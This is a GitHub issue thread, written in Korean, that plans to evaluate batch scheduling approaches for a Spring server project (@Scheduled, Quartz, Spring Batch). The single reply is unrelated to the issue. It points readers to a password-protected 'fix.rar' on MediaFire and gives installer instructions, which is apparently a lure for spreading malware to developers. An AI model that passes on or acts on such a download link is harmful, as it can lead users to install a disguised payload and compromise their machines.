### ISSUE TITLE
Batch scheduling 검토 및 적용

### ISSUE THREAD

**Issue by jun108059** [Nexters/8potatoes-server#39]
## ✍🏻 Description

배치 스케줄링을 적용하기 위해 다양한 스케줄링 방법을 검토하고, 요구사항에 맞는 최적의 방식을 선택하여 구현하는 Task입니다. 

## ✅ To-Do

- [ ] 배치 스케줄링 요구사항 분석 (단순 주기, 복잡한 트리거, 병렬 처리 여부 등)
- [ ] Spring `@Scheduled` 어노테이션 사용 여부 검토
- [ ] Quartz 스케줄러 도입 검토
- [ ] Spring Cloud Task와 Spring Batch 도입 검토 (필요 시)
- [ ] 선택된 스케줄링 방법을 적용하고 테스트

## 📨 ETC

- Quartz와 같은 복잡한 스케줄러는 트리거의 영속화, 병렬 작업 처리, 장애 복구 기능 등을 제공하므로 대규모 시스템에서 유리
- 단순한 주기적 작업의 경우 `@Scheduled` 어노테이션을 사용하는 것이 효율적

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
